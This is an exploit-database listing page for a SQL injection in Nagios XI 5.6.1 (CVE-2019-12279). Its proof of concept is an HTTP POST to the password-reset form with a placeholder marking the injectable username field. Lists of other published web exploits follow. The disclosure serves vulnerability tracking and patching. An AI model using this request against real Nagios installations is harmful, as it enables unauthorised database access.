"Nagios XI 5.6.1 - SQL injection"

Author

JameelNabbo

Platform

php

Release date

2019-05-23

                                        
                                             Download file
                                        
                                    
# Exploit Title: Nagiosxi username sql injection
# Date: 22/05/2019
# Exploit Author: JameelNabbo
# Website: jameelnabbo.com
# Vendor Homepage: https://www.nagios.com
# Software Link: https://www.nagios.com/products/nagios-xi/
# Version: xi-5.6.1
# Tested on: MacOSX
#CVE: CVE-2019-12279

POC:

POST /nagiosxi/login.php?forgotpass HTTP/1.1
Host: example.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:66.0) Gecko/20100101 Firefox/66.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://example.com/nagiosxi/login.php?forgotpass
Content-Type: application/x-www-form-urlencoded
Content-Length: 129
Connection: close
Cookie: nagiosxi=iu78vcultg46f35fq7lfbv8tc6
Upgrade-Insecure-Requests: 1

page=%2Fnagiosxi%2Flogin.php&pageopt=resetpass&nsp=cb6ad70efd0cc0b36ff4fc1d67cd70fb96a7e06622d281acb8810aa65485b03b&username={SQL INJECTION}

Release Date	Title	Type	Platform	Author
2019-08-16	"Integria IMS 5.0.86 - Arbitrary File Upload"	webapps	php	Greg.Priest
2019-08-16	"Joomla! component com_jsjobs 1.2.6 - Arbitrary File Deletion"	webapps	php	qw3rTyTy
2019-08-16	"EyesOfNetwork 5.1 - Authenticated Remote Command Execution"	webapps	php	"Nassim Asrir"
2019-08-14	"WordPress Plugin Download Manager 2.5 - Cross-Site Request Forgery"	webapps	php	"Princy Edward"
2019-08-14	"Joomla! Component JS Jobs (com_jsjobs) 1.2.5 - 'customfields.php' SQL Injection"	webapps	php	qw3rTyTy
2019-08-14	"SugarCRM Enterprise 9.0.0 - Cross-Site Scripting"	webapps	php	"Ilca Lucian Florin"
2019-08-12	"Mitsubishi Electric smartRTU / INEA ME-RTU - Unauthenticated OS Command Injection Bind Shell"	webapps	php	xerubus
2019-08-12	"Mitsubishi Electric smartRTU / INEA ME-RTU - Unauthenticated Configuration Download"	webapps	php	xerubus
2019-08-14	"Agent Tesla Botnet - Arbitrary Code Execution (Metasploit)"	remote	php	"Ege Balci"
2019-08-13	"AZORult Botnet - SQL Injection"	remote	php	prsecurity
2019-08-13	"Agent Tesla Botnet - Arbitrary Code Execution"	remote	php	prsecurity
2019-08-12	"Joomla! Component JS Jobs (com_jsjobs) 1.2.5 - 'cities.php' SQL Injection"	webapps	php	qw3rTyTy
2019-08-12	"osTicket 1.12 - Persistent Cross-Site Scripting"	webapps	php	"Aishwarya Iyer"
2019-08-12	"osTicket 1.12 - Formula Injection"	webapps	php	"Aishwarya Iyer"
2019-08-12	"osTicket 1.12 - Persistent Cross-Site Scripting via File Upload"	webapps	php	"Aishwarya Iyer"
2019-08-12	"Joomla! Component JS Support Ticket (com_jssupportticket) 1.1.6 - 'ticket.php' Arbitrary File Deletion"	webapps	php	qw3rTyTy
2019-08-12	"Joomla! Component JS Support Ticket (com_jssupportticket) 1.1.6 - 'ticketreply.php' SQL Injection"	webapps	php	qw3rTyTy
2019-08-12	"UNA 10.0.0 RC1 - 'polyglot.php' Persistent Cross-Site Scripting"	webapps	php	Greg.Priest
2019-08-12	"BSI Advance Hotel Booking System 2.0 - 'booking_details.php Persistent Cross-Site Scripting"	webapps	php	"Angelo Ruwantha"
2019-08-08	"Joomla! Component JS Support Ticket (component com_jssupportticket) 1.1.5 - SQL Injection"	webapps	php	qw3rTyTy
2019-08-08	"Adive Framework 2.0.7 - Cross-Site Request Forgery"	webapps	php	"Pablo Santiago"
2019-08-08	"Joomla! Component JS Support Ticket (component com_jssupportticket) 1.1.5 - Arbitrary File Download"	webapps	php	qw3rTyTy
2019-08-08	"Daily Expense Manager 1.0 - Cross-Site Request Forgery (Delete Income)"	webapps	php	"Mr Winst0n"
2019-08-08	"Open-School 3.0 / Community Edition 2.3 - Cross-Site Scripting"	webapps	php	Greg.Priest
2019-08-08	"Baldr Botnet Panel - Arbitrary Code Execution (Metasploit)"	remote	php	"Ege Balci"
2019-08-07	"WordPress Plugin JoomSport 3.3 - SQL Injection"	webapps	php	"Pablo Santiago"
2019-08-02	"1CRM On-Premise Software 8.5.7 - Persistent Cross-Site Scripting"	webapps	php	"Kusol Watchara-Apanukorn"
2019-08-02	"Rest - Cafe and Restaurant Website CMS - 'slug' SQL Injection"	webapps	php	n1x_
2019-08-02	"Sar2HTML 3.2.1 - Remote Command Execution"	webapps	php	"Cemal Cihad ÇİFTÇİ"
2019-08-01	"WebIncorp ERP - SQL injection"	webapps	php	n1x_

Release Date	Title	Type	Platform	Author
2019-06-04	"IceWarp 10.4.4 - Local File Inclusion"	webapps	php	JameelNabbo
2019-05-27	"Deltek Maconomy 2.2.5 - Local File Inclusion"	webapps	multiple	JameelNabbo
2019-05-23	"Nagios XI 5.6.1 - SQL injection"	webapps	php	JameelNabbo
2019-03-04	"Raisecom XPON ISCOMHT803G-U_2.0.0_140521_R4.1.47.002 - Remote Code Execution"	webapps	hardware	JameelNabbo
2019-02-15	"Jinja2 2.10 - 'from_string' Server Side Template Injection"	webapps	python	JameelNabbo
2018-02-16	"Twig < 2.4.4 - Server Side Template Injection"	webapps	php	JameelNabbo

import requests

response = requests.get('https://www.nmmapper.com/api/exploitdetails/46910/?format=json')

                                                {"url": "https://www.nmmapper.com/api/exploitdetails/46910/?format=json", "download_file": "https://www.nmmapper.com/st/exploitdetails/46910/41354/nagios-xi-561-sql-injection/download/", "exploit_id": "46910", "exploit_description": "\"Nagios XI 5.6.1 - SQL injection\"", "exploit_date": "2019-05-23", "exploit_author": "JameelNabbo", "exploit_type": "webapps", "exploit_platform": "php", "exploit_port": null}

For full documentation follow the link above

Cipherscan. A very simple way to find out which SSL ciphersuites are supported by a target.

Cipher	Protocols	Sigalg	Trusted